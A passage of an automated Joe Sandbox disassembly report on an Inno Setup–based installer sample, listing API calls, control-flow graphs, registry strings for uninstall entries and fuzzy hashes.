                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                          • Instruction ID: c2e77f62f7768c8d819fe5e4f890f04d0c30465c7a0250885ae4f210fddfc08b
                                                          • Opcode Fuzzy Hash: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                          • Instruction Fuzzy Hash: 9BE0927170021466D311A96A9C86AEAB35C975C314F00427FBA84E73C2EDB89E4146A9
                                                          APIs
                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424149,?,00000000,00424154), ref: 00423BA6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: NtdllProc_Window
                                                          • String ID:
                                                          • API String ID: 4255912815-0
                                                          • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                          • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                          • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                          • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                          • Instruction ID: 76bfcf8d2b29e22e6d76dcded3dafddf5190573ba102c834aba1eed314c6e9aa
                                                          • Opcode Fuzzy Hash: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                          • Instruction Fuzzy Hash: C9D0C27130460467C700AA68DC825AA358E8B84306F00483E3CC5DA2C3FABDDA485756
                                                          APIs
                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F534
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: NtdllProc_Window
                                                          • String ID:
                                                          • API String ID: 4255912815-0
                                                          • Opcode ID: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                          • Instruction ID: dfc14921be52f7ae21963fbc3fbcd64f7f6a072f88f97ccbdbccca1c2d2fc057
                                                          • Opcode Fuzzy Hash: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                          • Instruction Fuzzy Hash: 9FD09E7220011DBB9B00DE99E840C6B73ADAB88710BD09926F945C7642D634ED9197A5

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 406 46ee78-46eeaa 407 46eec7 406->407 408 46eeac-46eeb3 406->408 411 46eece-46ef06 call 403634 call 403738 call 42deb8 407->411 409 46eeb5-46eebc 408->409 410 46eebe-46eec5 408->410 409->407 409->410 410->411 418 46ef21-46ef4a call 403738 call 42dddc 411->418 419 46ef08-46ef1c call 403738 call 42deb8 411->419 427 46ef4c-46ef55 call 46eb48 418->427 428 46ef5a-46ef83 call 46ec64 418->428 419->418 427->428 432 46ef95-46ef98 call 403400 428->432 433 46ef85-46ef93 call 403494 428->433 437 46ef9d-46efe8 call 46ec64 call 42c3f4 call 46ecac call 46ec64 432->437 433->437 446 46effe-46f01f call 455570 call 46ec64 437->446 447 46efea-46effd call 46ecd4 437->447 454 46f075-46f07c 446->454 455 46f021-46f074 call 46ec64 call 4313fc call 46ec64 call 4313fc call 46ec64 446->455 447->446 456 46f07e-46f0bb call 4313fc call 46ec64 call 4313fc call 46ec64 454->456 457 46f0bc-46f0c3 454->457 455->454 456->457 461 46f104-46f129 call 40b434 call 46ec64 457->461 462 46f0c5-46f103 call 46ec64 * 3 457->462 481 46f12b-46f136 call 47bb50 461->481 482 46f138-46f141 call 403494 461->482 462->461 492 46f146-46f151 call 478898 481->492 482->492 496 46f153-46f158 492->496 497 46f15a 492->497 498 46f15f-46f329 call 403778 call 46ec64 call 47bb50 call 46ecac call 403494 call 40357c * 2 call 46ec64 call 403494 call 40357c * 2 call 46ec64 call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 496->498 497->498 561 46f33f-46f34d call 46ecd4 498->561 562 46f32b-46f33d call 46ec64 498->562 566 46f352 561->566 567 46f353-46f39c call 46ecd4 call 46ed08 call 46ec64 call 47bb50 call 46ed6c 562->567 566->567 578 46f3c2-46f3cf 567->578 579 46f39e-46f3c1 call 46ecd4 * 2 567->579 581 46f3d5-46f3dc 578->581 582 46f49e-46f4a5 578->582 579->578 586 46f3de-46f3e5 581->586 587 46f449-46f458 581->587 583 46f4a7-46f4dd call 4941f8 582->583 584 46f4ff-46f515 RegCloseKey 582->584 583->584 586->587 591 46f3e7-46f40b call 430bc4 586->591 590 46f45b-46f468 587->590 594 46f47f-46f498 call 430c00 call 46ecd4 590->594 595 46f46a-46f477 590->595 591->590 601 46f40d-46f40e 591->601 604 46f49d 594->604 595->594 597 46f479-46f47d 595->597 597->582 597->594 603 46f410-46f436 call 40b434 call 4790c4 601->603 609 46f443-46f445 603->609 610 46f438-46f43e call 430bc4 603->610 604->582 609->603 612 46f447 609->612 610->609 612->590
                                                          APIs
                                                            • Part of subcall function 0046EC64: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                            • Part of subcall function 0046ECD4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                          • RegCloseKey.ADVAPI32(?,0046F51D,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F568,?,?,0049C1D0,00000000), ref: 0046F510
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Value$Close
                                                          • String ID: " /SILENT$5.5.1 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                          • API String ID: 3391052094-213252641
                                                          • Opcode ID: db2c8a7a7111b7a2256de2528cb94e5858c2f33c6448f5c94e9fc589d623ae97
                                                          • Instruction ID: b1500e3f1927c4d0668730226bdd95c12c24136f653289305a03eef3c2fa698f
                                                          • Opcode Fuzzy Hash: db2c8a7a7111b7a2256de2528cb94e5858c2f33c6448f5c94e9fc589d623ae97
                                                          • Instruction Fuzzy Hash: 40125334A001089BDB04EF56E991ADE73F5FB48304F60807BE8506B765EB78BD45CB5A

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1027 491d44-491d78 call 403684 1030 491d7a-491d89 call 446f94 Sleep 1027->1030 1031 491d8e-491d9b call 403684 1027->1031 1036 49221e-492238 call 403420 1030->1036 1037 491dca-491dd7 call 403684 1031->1037 1038 491d9d-491dc0 call 446ff0 call 403738 FindWindowA call 447270 1031->1038 1046 491dd9-491e01 call 446ff0 call 403738 FindWindowA call 447270 1037->1046 1047 491e06-491e13 call 403684 1037->1047 1057 491dc5 1038->1057 1046->1036 1055 491e5c-491e69 call 403684 1047->1055 1056 491e15-491e57 call 446f94 * 4 SendMessageA call 447270 1047->1056 1065 491eb8-491ec5 call 403684 1055->1065 1066 491e6b-491eb3 call 446f94 * 4 PostMessageA call 4470c8 1055->1066 1056->1036 1057->1036 1074 491f14-491f21 call 403684 1065->1074 1075 491ec7-491f0f call 446f94 * 4 SendNotifyMessageA call 4470c8 1065->1075 1066->1036 1087 491f4e-491f5b call 403684 1074->1087 1088 491f23-491f49 call 446ff0 call 403738 RegisterClipboardFormatA call 447270 1074->1088 1075->1036 1102 491f5d-491f97 call 446f94 * 3 SendMessageA call 447270 1087->1102 1103 491f9c-491fa9 call 403684 1087->1103 1088->1036 1102->1036 1115 491fab-491feb call 446f94 * 3 PostMessageA call 4470c8 1103->1115 1116 491ff0-491ffd call 403684 1103->1116 1115->1036 1127 491fff-49203f call 446f94 * 3 SendNotifyMessageA call 4470c8 1116->1127 1128 492044-492051 call 403684 1116->1128 1127->1036 1138 492053-492071 call 446ff0 call 42e38c 1128->1138 1139 4920a6-4920b3 call 403684 1128->1139 1159 492083-492091 GetLastError call 447270 1138->1159 1160 492073-492081 call 447270 1138->1160 1150 49212d-49213a call 403684 1139->1150 1151 4920b5-4920e1 call 446ff0 call 403738 call 446f94 GetProcAddress 1139->1151 1165 49213c-49215d call 446f94 FreeLibrary call 4470c8 1150->1165 1166 492162-49216f call 403684 1150->1166 1184 49211d-492128 call 4470c8 1151->1184 1185 4920e3-492118 call 446f94 * 2 call 447270 call 4470c8 1151->1185 1171 492096-4920a1 call 447270 1159->1171 1160->1171 1165->1036 1177 492171-49218f call 446ff0 call 403738 CreateMutexA 1166->1177 1178 492194-4921a1 call 403684 1166->1178 1171->1036 1177->1036 1193 4921a3-4921d5 call 48c174 call 403574 call 403738 OemToCharBuffA call 48c18c 1178->1193 1194 4921d7-4921e4 call 403684 1178->1194 1184->1036 1185->1036 1193->1036 1203 49221a 1194->1203 1204 4921e6-492218 call 48c174 call 403574 call 403738 CharToOemBuffA call 48c18c 1194->1204 1203->1036 1204->1036
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,00000000,00492239,?,?,?,?,00000000,00000000,00000000), ref: 00491D84
                                                          • FindWindowA.USER32(00000000,00000000), ref: 00491DB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FindSleepWindow
                                                          • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                          • API String ID: 3078808852-3310373309
                                                          • Opcode ID: 75f42c2bc3d671ddacef7ceddea1dce46e469a81ba41ac7012420b40329701a8
                                                          • Instruction ID: dc8cd37179c6c7efec8ae072485b7dd58185b77a9baa1073e2e80a3326dd0ce5
                                                          • Opcode Fuzzy Hash: 75f42c2bc3d671ddacef7ceddea1dce46e469a81ba41ac7012420b40329701a8
                                                          • Instruction Fuzzy Hash: 6CC19360B043406BDB24BF7E9D4291A59999F98708711897FB846EB38BCE7CDC0E439D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1589 483038-48305d GetModuleHandleA GetProcAddress 1590 48305f-483075 GetNativeSystemInfo GetProcAddress 1589->1590 1591 4830c4-4830c9 GetSystemInfo 1589->1591 1592 4830ce-4830d7 1590->1592 1593 483077-483082 GetCurrentProcess 1590->1593 1591->1592 1594 4830d9-4830dd 1592->1594 1595 4830e7-4830ee 1592->1595 1593->1592 1602 483084-483088 1593->1602 1596 4830df-4830e3 1594->1596 1597 4830f0-4830f7 1594->1597 1598 483109-48310e 1595->1598 1600 4830f9-483100 1596->1600 1601 4830e5-483102 1596->1601 1597->1598 1600->1598 1601->1598 1602->1592 1603 48308a-483091 call 4526f0 1602->1603 1603->1592 1607 483093-4830a0 GetProcAddress 1603->1607 1607->1592 1608 4830a2-4830b9 GetModuleHandleA GetProcAddress 1607->1608 1608->1592 1609 4830bb-4830c2 1608->1609 1609->1592
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483049
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483056
                                                          • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483064
                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0048306C
                                                          • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483078
                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483099
                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004830AC
                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 004830B2
                                                          • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004830C9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                          • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                          • API String ID: 2230631259-2623177817
                                                          • Opcode ID: 19051ef92357407474476a60c046aa04f8c513acd1fb492cc3cf86325791a6e5
                                                          • Instruction ID: af3d4bc633e3fac8e2117acd109dd394a62660f1f52edacbaea6f09291502d38
                                                          • Opcode Fuzzy Hash: 19051ef92357407474476a60c046aa04f8c513acd1fb492cc3cf86325791a6e5
                                                          • Instruction Fuzzy Hash: 9211B69010574194DA117B764C5E76F19888B12F1BF140C3BB880662DBEABD8F45CB2F

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1615 468bb0-468be8 call 47bb50 1618 468bee-468bfe call 4788b8 1615->1618 1619 468dca-468de4 call 403420 1615->1619 1624 468c03-468c48 call 4078e4 call 403738 call 42de14 1618->1624 1630 468c4d-468c4f 1624->1630 1631 468c55-468c6a 1630->1631 1632 468dc0-468dc4 1630->1632 1633 468c7f-468c86 1631->1633 1634 468c6c-468c7a call 42dd44 1631->1634 1632->1619 1632->1624 1636 468cb3-468cba 1633->1636 1637 468c88-468caa call 42dd44 call 42dd5c 1633->1637 1634->1633 1639 468d13-468d1a 1636->1639 1640 468cbc-468ce1 call 42dd44 * 2 1636->1640 1637->1636 1656 468cac 1637->1656 1642 468d60-468d67 1639->1642 1643 468d1c-468d2e call 42dd44 1639->1643 1660 468ce3-468cec call 4314f0 1640->1660 1661 468cf1-468d03 call 42dd44 1640->1661 1645 468da2-468db8 RegCloseKey 1642->1645 1646 468d69-468d9d call 42dd44 * 3 1642->1646 1657 468d30-468d39 call 4314f0 1643->1657 1658 468d3e-468d50 call 42dd44 1643->1658 1646->1645 1656->1636 1657->1658 1658->1642 1668 468d52-468d5b call 4314f0 1658->1668 1660->1661 1661->1639 1672 468d05-468d0e call 4314f0 1661->1672 1668->1642 1672->1639
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(?,00468DCA,?,?,00000001,00000000,00000000,00468DE5,?,00000000,00000000,?), ref: 00468DB3
                                                          Strings
                                                          • Inno Setup: User Info: Organization, xrefs: 00468D82
                                                          • Inno Setup: App Path, xrefs: 00468C72
                                                          • Inno Setup: Icon Group, xrefs: 00468C8E
                                                          • Inno Setup: Selected Tasks, xrefs: 00468D1F
                                                          • %s\%s_is1, xrefs: 00468C2D
                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468C0F
                                                          • Inno Setup: User Info: Serial, xrefs: 00468D95
                                                          • Inno Setup: Deselected Tasks, xrefs: 00468D41
                                                          • Inno Setup: User Info: Name, xrefs: 00468D6F
                                                          • Inno Setup: Setup Type, xrefs: 00468CC2
                                                          • Inno Setup: Deselected Components, xrefs: 00468CF4
                                                          • Inno Setup: Selected Components, xrefs: 00468CD2
                                                          • Inno Setup: No Icons, xrefs: 00468C9B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                          • API String ID: 47109696-1093091907
                                                          • Opcode ID: 8db79232fb2f2725b9adfe70d64749861c257aff0263038353b857e31bb30bb7
                                                          • Instruction ID: 9409bd20b999dcc9be58dd01f280802f9f4acbf4d31626fc1b9235e67c3febe1
                                                          • Opcode Fuzzy Hash: 8db79232fb2f2725b9adfe70d64749861c257aff0263038353b857e31bb30bb7
                                                          • Instruction Fuzzy Hash: B451C430A006489BCB11DB65C9917DEB7F5EF98304F50816FE840A7391EB78AE41CB19

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1833 42386c-423876 1834 42399f-4239a3 1833->1834 1835 42387c-42389e call 41f3bc GetClassInfoA 1833->1835 1838 4238a0-4238b7 RegisterClassA 1835->1838 1839 4238cf-4238d8 GetSystemMetrics 1835->1839 1838->1839 1842 4238b9-4238ca call 408cac call 40311c 1838->1842 1840 4238da 1839->1840 1841 4238dd-4238e7 GetSystemMetrics 1839->1841 1840->1841 1843 4238e9 1841->1843 1844 4238ec-423948 call 403738 call 4062e8 call 403400 call 423644 SetWindowLongA 1841->1844 1842->1839 1843->1844 1856 423962-423990 GetSystemMenu DeleteMenu * 2 1844->1856 1857 42394a-42395d call 424170 SendMessageA 1844->1857 1856->1834 1858 423992-42399a DeleteMenu 1856->1858 1857->1856 1858->1834
                                                          APIs
                                                            • Part of subcall function 0041F3BC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                          • GetClassInfoA.USER32(00400000,00423674), ref: 00423897
                                                          • RegisterClassA.USER32(00499630), ref: 004238AF
                                                          • GetSystemMetrics.USER32(00000000), ref: 004238D1
                                                          • GetSystemMetrics.USER32(00000001), ref: 004238E0
                                                          • SetWindowLongA.USER32(00410648,000000FC,00423684), ref: 0042393C
                                                          • SendMessageA.USER32(00410648,00000080,00000001,00000000), ref: 0042395D
                                                          • GetSystemMenu.USER32(00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423968
                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423977
                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423984
                                                          • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000), ref: 0042399A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                          • String ID: t6B
                                                          • API String ID: 183575631-3178735703
                                                          • Opcode ID: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                          • Instruction ID: b8adc5bb76ba60810a7e15457cf144511173abf09441cb7f9a8677178c11600e
                                                          • Opcode Fuzzy Hash: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                          • Instruction Fuzzy Hash: 003150B17402006AE710BF699C82F6A37989B14709F60017AFA44EF2D7C6BDED44876D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1972 47c65c-47c6b2 call 42c3f4 call 4035c0 call 47c320 call 4525ac 1981 47c6b4-47c6b9 call 453318 1972->1981 1982 47c6be-47c6cd call 4525ac 1972->1982 1981->1982 1986 47c6e7-47c6ed 1982->1986 1987 47c6cf-47c6d5 1982->1987 1990 47c704-47c72c call 42e38c * 2 1986->1990 1991 47c6ef-47c6f5 1986->1991 1988 47c6f7-47c6ff call 403494 1987->1988 1989 47c6d7-47c6dd 1987->1989 1988->1990 1989->1986 1992 47c6df-47c6e5 1989->1992 1998 47c753-47c76d GetProcAddress 1990->1998 1999 47c72e-47c74e call 4078e4 call 453318 1990->1999 1991->1988 1991->1990 1992->1986 1992->1988 2001 47c76f-47c774 call 453318 1998->2001 2002 47c779-47c796 call 403400 * 2 1998->2002 1999->1998 2001->2002
                                                          APIs
                                                          • GetProcAddress.KERNEL32(6F9D0000,SHGetFolderPathA), ref: 0047C75E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$imI$shell32.dll$shfolder.dll
